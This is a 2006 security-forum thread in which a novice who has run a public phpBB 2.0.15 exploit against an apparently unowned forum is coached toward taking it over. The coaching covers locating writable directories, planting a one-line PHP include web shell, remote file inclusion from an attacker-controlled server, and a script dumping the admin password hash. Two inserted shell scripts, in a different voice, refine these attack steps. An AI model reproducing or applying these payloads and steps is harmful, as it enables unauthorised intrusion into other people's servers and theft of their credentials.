Waraxe IT Security Portal
www.waraxe.us Forum Index -> Newbies corner

PLEASE HELP, don't know where to post!! :( (phpBB 2015)

Posted: Thu Jun 01, 2006 4:01 pm
utilizator (Regular user; Joined: Jun 01, 2006; Posts: 11)

Hello all first,
I'm reading this forum for a month or so trying to get a solution to hack a phpBB 2.0.15 forum...
Finally found this exploit http://downloads.securityfocus.com/vulnerabilities/exploits/phpbb2_0_15.pl , figured out Perl also, and the exploit works; after execution, the ls command works.
So the only thing I found on this forum was to "cat config.php"

so I did, and ended up with:
<?php

// phpBB 2.x auto-generated confi
// Do not change anything in this

$dbms = 'mysql';

$dbhost = 'localhost';
$dbname = 'theforumdbname';
$dbuser = 'thedbuser';
$dbpasswd = 'thedbpass';

$table_prefix = 'phpbb_';

define('PHPBB_INSTALLED', true);

Ok, so now I have theforumdbname, thedbuser and thedbpass ... and? what to do next?
I see that the sql connection must be from localhost, but I don't have access to the server where the forum is hosted, and I don't know the phpmyadmin login page.
I'm pretty sure that the 'wget' command is disabled or something, because wgetting something doesn't work but "wget --version" does...
So I'm kinda stuck, and didn't find any answers on this forum, nor on google...
If anyone can help me, I thank you in advance!
PS: Sorry for the poor English...

Posted: Thu Jun 01, 2006 4:20 pm
Chb (Valuable expert; Joined: Jul 23, 2005; Posts: 206; Location: Germany)

First, figure out in which directories you can write. Then write a shell or a script which connects to MySQL and prints you the username+hash.
What does "uname -a" and "id" say? And if it is *BSD you can also try "fetch" instead of "wget".

_________________
www.der-chb.de

...
Posted: Thu Jun 01, 2006 4:33 pm
utilizator (Regular user; Joined: Jun 01, 2006; Posts: 11)

1. theforumdbname, thedbuser and thedbpass: I have replaced them in this post, in fact the exploit had shown me the real ones.
2. ls -l gets this:

phpBB2.0.15> ls -l
total 385
drwxr-xr-x 2 32028 web-user 736 Oct 20 2005 admin
drwxr-xr-x 2 32028 web-user 112 Oct 20 2005 cache
-rw-r--r-- 1 32028 web-user 6726 Feb 17 13:17 common.php
-rw-r--r-- 1 32028 web-user 276 May 16 18:09 config.php
drwxr-xr-x 3 32028 web-user 320 Feb 21 01:33 db
drwxr-xr-x 2 32028 web-user 296 Oct 20 2005 docs
-rw-r--r-- 1 32028 web-user 810 Feb 17 13:17 extension.inc
-rw-r--r-- 1 32028 web-user 3643 Feb 17 13:17 faq.php
-rw-r--r-- 1 32028 web-user 45673 Feb 17 13:17 groupcp.php
drwxr-xr-x 4 32028 web-user 160 Oct 20 2005 images
drwxr-xr-x 2 32028 web-user 976 Oct 20 2005 includes
-rw-r--r-- 1 32028 web-user 14515 Feb 17 13:17 index.php
-rw-r--r-- 1 32028 web-user 523 Feb 15 17:47 index_avarie.php
drwxr-xr-x 4 32028 web-user 144 Oct 20 2005 language
-rw-r--r-- 1 32028 web-user 7748 Feb 17 13:17 login.php
-rw-r--r-- 1 32028 web-user 12150 Feb 17 13:17 memberlist.php
-rw-r--r-- 1 32028 web-user 37796 Feb 17 13:17 modcp.php
-rw-r--r-- 1 32028 web-user 34445 Feb 17 13:17 posting.php
-rw-r--r-- 1 32028 web-user 72541 Feb 17 13:17 privmsg.php
-rw-r--r-- 1 32028 web-user 3947 Feb 17 13:17 profile.php
-rw-r--r-- 1 32028 web-user 43265 Feb 17 13:17 search.php
drwxr-xr-x 3 32028 web-user 112 Oct 20 2005 templates
-rw-r--r-- 1 32028 web-user 23154 Feb 17 13:17 viewforum.php
-rw-r--r-- 1 32028 web-user 7233 Feb 17 13:17 viewonline.php
-rw-r--r-- 1 32028 web-user 45228 Feb 17 13:17 viewtopic.php
phpBB2.0.15>

So you tell me which one I can write....

uname -a:

Linux web-hosting2.provider 2.6.15-vs2.0.1-gentoo-r5 #1 SMP PREEMPT Wed May 17 11:02:29 EEST 2006 i686 Intel(R) Xeon(TM) CPU 3.00GHz GenuineIntel GNU/Linux
phpBB2.0.15>

And I have another problem I forgot about: the cd command doesn't work, though I can ls through dirs or files within dirs.
Any idea?

Posted: Thu Jun 01, 2006 6:47 pm
Chb (Valuable expert; Joined: Jul 23, 2005; Posts: 206; Location: Germany)

I told you to execute "id". With this information you can look at which directories are writable for your user; otherwise look for chmod 777 (google how to find it... e.g. /images/avatars).
1.: I know.
3.: In almost all Linux utilities you can give the absolute path as parameter, so "pwd". Wink

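An added example, not code from Chb or anyone else in this thread, of what the two Chb replies above ask for: finding directories under the web root that the web-server account can write to. The directory tree it builds is constructed for the demonstration and mirrors the layout from the ls output (forum/, images/, cache/ at 755 and an avatars/ at 777); the function names are mine.

```shell
#!/bin/sh
# Added example, not code from the thread. Finds directories a low-privileged
# web-server account could drop a file into. Two checks are shown because
# they answer different questions:
#   world_writable_dirs  - mode based: the o+w bit is set ("chmod 777")
#   writable_dirs_for_me - access based: the current user can write there,
#                          which also catches owner- or group-writable paths
#                          (the thread's "id" showed uid 81 apache against
#                          files owned by uid 32028, so only o+w helps there)
# demo_tree builds a constructed tree mirroring the thread's ls output.

# Directories under $1 with the world-write bit set.
# -perm -0002 is POSIX and behaves the same with GNU and BSD find.
world_writable_dirs() {
    find "$1" -type d -perm -0002 2>/dev/null | sort
}

# Directories under $1 the current user can write to. Meaningless as root,
# where -w is true everywhere.
writable_dirs_for_me() {
    find "$1" -type d -exec sh -c '[ -w "$1" ] && printf "%s\n" "$1"' _ {} \; 2>/dev/null | sort
}

# Exit status 0 if the single directory $1 is world-writable.
is_world_writable() {
    [ -n "$(find "$1" -maxdepth 0 -type d -perm -0002 2>/dev/null)" ]
}

# Constructed tree: forum/ 755, forum/images/ 755, forum/cache/ 755,
# forum/images/avatars/ 777. Prints the root so callers can clean up.
demo_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/forum/images/avatars" "$root/forum/cache"
    chmod 755 "$root/forum" "$root/forum/images" "$root/forum/cache"
    chmod 777 "$root/forum/images/avatars"
    printf '%s\n' "$root"
}

t=$(demo_tree)
echo "world-writable directories under $t/forum:"
world_writable_dirs "$t/forum"
echo "directories this user can write to under $t/forum:"
writable_dirs_for_me "$t/forum"
rm -rf "$t"
```

On the real target you would run the first check against the forum root from the pwd output; the second only tells you something when you run it as the web-server user, never as root.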

ok...
Posted: Thu Jun 01, 2006 7:20 pm
utilizator (Regular user; Joined: Jun 01, 2006; Posts: 11)

chmod 777 - no effect whatsoever, I think you must be admin-logged in order for that to work

the pwd result:

phpBB2.0.15> pwd
/hosting/www/www.domain.com-docs/forum
phpBB2.0.15>

the id result:

phpBB2.0.15> id
uid=81(apache) gid=81(apache) groups=81(apache)

and also, hooray!!! ^^^:

phpBB2.0.15> ls images -l
total 13
drwxrwxrwx 3 32028 web-user 4472 May 31 19:37 avatars

!!!
But what now? Confused

Posted: Thu Jun 01, 2006 8:22 pm
waraxe (Site admin; Joined: May 11, 2004; Posts: 2407; Location: Estonia, Tartu)

So you have php scripting level access + shell command execution possibilities. Now you must write some simple upload php script directly to the webserver (example - use 'echo "<?php....blablabla..." >> /hosting/www/www.domain.com-docs/forum/myupload.php' commands). And with the upload script just upload whatever you need for the next step - like a root exploit, written in the C language (if gcc is available).
But as it seems to be shared (virtual) hosting, I don't believe that you can get that b0x r00ted Wink

Anyway - try "cat /proc/version" - to determine the kernel version Smile

hmm...
Posted: Thu Jun 01, 2006 8:27 pm
utilizator (Regular user; Joined: Jun 01, 2006; Posts: 11)

ok, thanks waraxe for noticing me... but... I'm posting under the n00b section... you've got me all confused now... where to write the script? and how to upload it... anyway... I just want admin privileges on the forum...
sorry... but if you have some time, please explain more...
sorry again if I'm bothering you...

Posted: Thu Jun 01, 2006 8:37 pm
utilizator (Regular user; Joined: Jun 01, 2006; Posts: 11)

* Sorry for the multi-post, but just tried this:
Obviously the 'avatars' dir within the 'images' one has chmod 777:

phpBB2.0.15> ls images -l
total 13
drwxrwxrwx 3 32028 web-user 4472 May 31 19:37 avatars
-rw-r--r-- 1 32028 web-user 169 Oct 20 2005 index.htm
drwxr-xr-x 4 32028 web-user 872 Feb 21 01:20 smiles
-rw-r--r-- 1 32028 web-user 807 Oct 20 2005 spacer.gif
phpBB2.0.15>

* So I try to upload some text file to the webserver:

phpBB2.0.15> wget http://mydomain.com/loghin/l.txt images/avatars/
phpBB2.0.15>

* And end up with nothing, 'cat' does nothing:

phpBB2.0.15> cat images/avatars/l.txt
phpBB2.0.15>

* And the avatars folder is full of jpegs:

phpBB2.0.15> ls images/avatars

* Am I doing something wrong? What else is there to do?

Posted: Thu Jun 01, 2006 9:05 pm
waraxe (Site admin; Joined: May 11, 2004; Posts: 2407; Location: Estonia, Tartu)

Ok, I suggest trying to write a 1-line-long php script to the webserver.
Maybe to the avatars directory?
This php script contains only one line:

Code:

<?php include($r); /* register_globals=On is needed for $r to be filled from the request */ ?>


or

Code:

<?php include(stripslashes($_GET['r'])); ?>


How to write this script to the server?
Try first some simple text file with the "echo" command..
Like:

Code:

echo test >> /hosting/www/www.domain.com-docs/forum/images/avatars/test.txt


and if it works, you can see the text file:

http://www.domain.com/forum/images/avatars/test.txt

In this way you can add text line by line to the file!

And finally - when you have that one-line php script working, you can try:

http://www.domain.com/forum/images/avatars/test.php?r=http://www.yahoo.com

... and hopefully you will see the yahoo page ...

This gives you the possibility of remote file inclusion. So you can put some bigger php script on your own server and execute it on the victim server.
Very simple script for admin password dumping:

Code:

<?php
error_reporting(E_ALL);
// config.php defines $dbhost, $dbuser, $dbpasswd, $dbname and $table_prefix
include('config.php');
$h=mysql_connect($dbhost,$dbuser,$dbpasswd);
mysql_select_db($dbname,$h);
// user_level=1 is the administrator level in phpBB 2.x
$res=mysql_query("SELECT username,user_password FROM ".$table_prefix."users WHERE user_level=1",$h);
$row=mysql_fetch_row($res);
$un=$row[0];$pw=$row[1];
echo "$un:$pw";
?>


I wrote that and tested it within 5 minutes and it works as expected;
Upload this script to your own server, then

http://www.domain.com/forum/images/avatars/test.php?r=http://www.yourownserver.com/myscript.php

and you will see the first admin's username and password md5 hash encountered in the database.

Of course, you can write this bigger script right to the victim server, skipping the remote inclusion trick. It's your choice ...

hmm...
Posted: Thu Jun 01, 2006 9:34 pm
utilizator (Regular user; Joined: Jun 01, 2006; Posts: 11)

ok, so,
Code:
echo test >> /hosting/www/www.domain.com-docs/forum/images/avatars/test.txt

makes the txt file but it contains the word test written several times, like this:
Code:
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test


nevertheless, the command:

Code:
echo "<?php include(stripslashes($_GET['r']));?>" >> /hosting/www/www.domain.com-docs/forum/images/avatars/test.php


indeed creates the test.php file, and after 'cat'-ing the images/avatars/test.php, I see the:

Code:
<?php include(stripslashes($_GET['r']));?>


written several times, and also

Code:
http://www.domain.com/forum/images/avatars/test.php?r=http://www.yahoo.com


doesn't work...
I know this is the right track, but what now?

Posted: Thu Jun 01, 2006 9:43 pm
waraxe (Site admin; Joined: May 11, 2004; Posts: 2407; Location: Estonia, Tartu)

Probably "allow_url_fopen=0" Smile

Hmm, so you can try to construct this script:

Code:

<?php
error_reporting(E_ALL);
include('config.php');
$h=mysql_connect($dbhost,$dbuser,$dbpasswd);
mysql_select_db($dbname,$h);
$res=mysql_query("SELECT username,user_password FROM ".$table_prefix."users WHERE user_level=1",$h);
$row=mysql_fetch_row($res);
$un=$row[0];$pw=$row[1];
echo "$un:$pw";
?>


line by line.

As you know, "echo bla > x.txt" creates or overwrites file,
but "echo bla >> x.txt" adds one line to file. So you can build script line by line.
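An added example, not code from waraxe or anyone else in this thread, for the line-by-line echo technique he describes here and in his earlier suggestion of writing an upload script with 'echo "..." >> file'. It shows the quoting detail a POSIX shell imposes: inside double quotes the shell still expands $name and an embedded " ends the string, so PHP lines carrying $ variables must be single-quoted. It also spells out the absolute path of config.php (the /hosting/www/www.domain.com-docs/forum path from the pwd output), because a script dropped in images/avatars cannot find config.php by a bare relative name. The PHP lines are the dump script from the post above; the output file is a temp file and the function names are mine.

```shell
#!/bin/sh
# Added example, not code from the thread. Builds the admin-hash dump script
# one line at a time with echo, as waraxe describes, and shows the quoting
# pitfall: inside double quotes the shell still expands $name and an
# embedded " closes the string, so the PHP variables vanish. Single quotes
# pass the line through verbatim. The output file here is a temp file; on
# the target it would be the world-writable images/avatars directory.

# What a double-quoted echo of the connect line really writes: the PHP
# variables are undefined in the shell and expand to nothing.
broken_line() {
    unset h dbhost dbuser dbpasswd
    echo "$h=mysql_connect($dbhost,$dbuser,$dbpasswd);"
}

# The same line single-quoted: the shell leaves every $ and " alone.
safe_line() {
    echo '$h=mysql_connect($dbhost,$dbuser,$dbpasswd);'
}

# Write the script to $1 line by line. $2 is the absolute path of the
# forum's config.php, spelled out because the script is not in the forum
# root. The first echo uses ">" so a rerun starts from an empty file
# instead of appending a second copy (compare the repeated "test" lines
# in the thread's test.txt).
build_dump_script() {
    out=$1
    cfg=$2
    echo '<?php' > "$out"
    echo 'error_reporting(E_ALL);' >> "$out"
    # the one line that needs a shell variable: printf with %s keeps the
    # PHP quotes intact and expands only $cfg
    printf "include('%s');\n" "$cfg" >> "$out"
    echo '$h=mysql_connect($dbhost,$dbuser,$dbpasswd);' >> "$out"
    echo 'mysql_select_db($dbname,$h);' >> "$out"
    echo '$res=mysql_query("SELECT username,user_password FROM ".$table_prefix."users WHERE user_level=1",$h);' >> "$out"
    echo '$row=mysql_fetch_row($res);' >> "$out"
    echo '$un=$row[0];$pw=$row[1];' >> "$out"
    echo 'echo "$un:$pw";' >> "$out"
    echo '?>' >> "$out"
}

# Number of lines in $1 that still carry a PHP variable sigil; a script
# mangled by shell expansion loses them.
count_dollar_lines() {
    grep -c '\$' "$1"
}

# Total number of lines written to $1.
line_count() {
    wc -l < "$1" | tr -d ' '
}

f=$(mktemp)
build_dump_script "$f" /hosting/www/www.domain.com-docs/forum/config.php
echo "double-quoted echo writes : $(broken_line)"
echo "single-quoted echo writes : $(safe_line)"
echo "--- built script ---"
cat "$f"
rm -f "$f"
```

After building the file, a cat of it should show every $ sign intact; a line that reads =mysql_connect(,,); means the shell ate the variables and the file has to be rewritten with single quotes.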

back...
Posted: Sat Jun 03, 2006 1:51 pm
utilizator (Regular user; Joined: Jun 01, 2006; Posts: 11)

Sorry, but I had some ISP trouble and no internet connection...
Tried again to connect to that forum, and it worked, but the ls, cat, rm (the only ones I've tested) commands don't work anymore.
So I echoed a test.txt file where I knew the chmod 777 was (images/avatars), and when I tried to display it (http://theadress.com/forum/images/avatars/test.txt) it worked!
So I tried this:
Code:

phpBB2.0.15> echo "<?php" >> /hosting/www/www.site.com-docs/forum/images/avatars/test.php
phpBB2.0.15> echo "error_reporting(E_ALL);" >> /hosting/www/www.site.com-docs/forum/images/avatars/test.php
phpBB2.0.15> echo "include('config.php');" >> /hosting/www/www.site.com-docs/forum/images/avatars/test.php
phpBB2.0.15> echo "$h=mysql_connect($dbhost,$dbuser,$dbpasswd);" >> /hosting/www/www.site.com-docs/forum/images/avatars/test.php
phpBB2.0.15> echo "mysql_select_db($dbname,$h);" >> /hosting/www/www.site.com-docs/forum/images/avatars/test.php
phpBB2.0.15> echo "$res=mysql_query("SELECT username,user_password FROM ".$table_prefix."users WHERE user_level=1",$h);" >> /hosting/www/www.site.com-docs/forum/images/avatars/test.php
phpBB2.0.15> echo "$row=mysql_fetch_row($res);" >> /hosting/www/www.site.com-docs/forum/images/avatars/test.php
phpBB2.0.15> echo "$un=$row[0];$pw=$row[1];" >> /hosting/www/www.site.com-docs/forum/images/avatars/test.php
phpBB2.0.15> echo "echo "$un:$pw";" >> /hosting/www/www.site.com-docs/forum/images/avatars/test.php
phpBB2.0.15> echo "?> " >> /hosting/www/www.site.com-docs/forum/images/avatars/test.php
phpBB2.0.15>


but, what do you know? http://theadress.com/forum/images/avatars/test.php doesn't do anything... Sad

I don't know what happened 2 days ago and why those commands don't work, and I also don't know what I am doing wrong with the php code...
Code:

<?php
error_reporting(E_ALL);
include('config.php');
$h=mysql_connect($dbhost,$dbuser,$dbpasswd);
mysql_select_db($dbname,$h);
$res=mysql_query("SELECT username,user_password FROM ".$table_prefix."users WHERE user_level=1",$h);
$row=mysql_fetch_row($res);
$un=$row[0];$pw=$row[1];
echo "$un:$pw";
?>

Do I need to replace something in the code? Because I had written it like it is...


Isn't there anything else I can do? Maybe use theforumdbname, thedbuser and thedbpass somehow?

Posted: Sat Jun 03, 2006 2:39 pm
Chb (Valuable expert; Joined: Jul 23, 2005; Posts: 206; Location: Germany)

Yes, you have to change it.
If you knew what you have been copying, you would know that "config.php" is included. And where is it? I'm sure that it isn't in "images/avatars"... So set the path via ".." or use the absolute path.


Posted: Sat Jun 03, 2006 2:49 pm
utilizator (Regular user; Joined: Jun 01, 2006; Posts: 11)

Chb wrote:
Yes, you have to change it.
If you knew what you have been copying, you would know that "config.php" is included. And where is it? I'm sure that it isn't in "images/avatars"... So set the path via ".." or use the absolute path.


I don't, remember? "Newbies corner".... Smile
So please tell me, I understand that I need to change this line:
Code:
include('config.php');


with one of these (?):

Code:
include('/hosting/www/www.site.com-docs/forum/config.php');

Code:
include('http://www.site.com/forum/config.php');

?
And if so, do I need to include the address (which one?) between
Code:
"
?

Thanks all for all the help, and I hope you'll answer me once more...

Posted: Sat Jun 03, 2006 2:59 pm
utilizator (Regular user; Joined: Jun 01, 2006; Posts: 11)

ok, replaced one line,
Code:
include('config.php');
with
Code:
include('http://site.com/forum/config.php');
nothing happens either...

All times are GMT
Page 1 of 2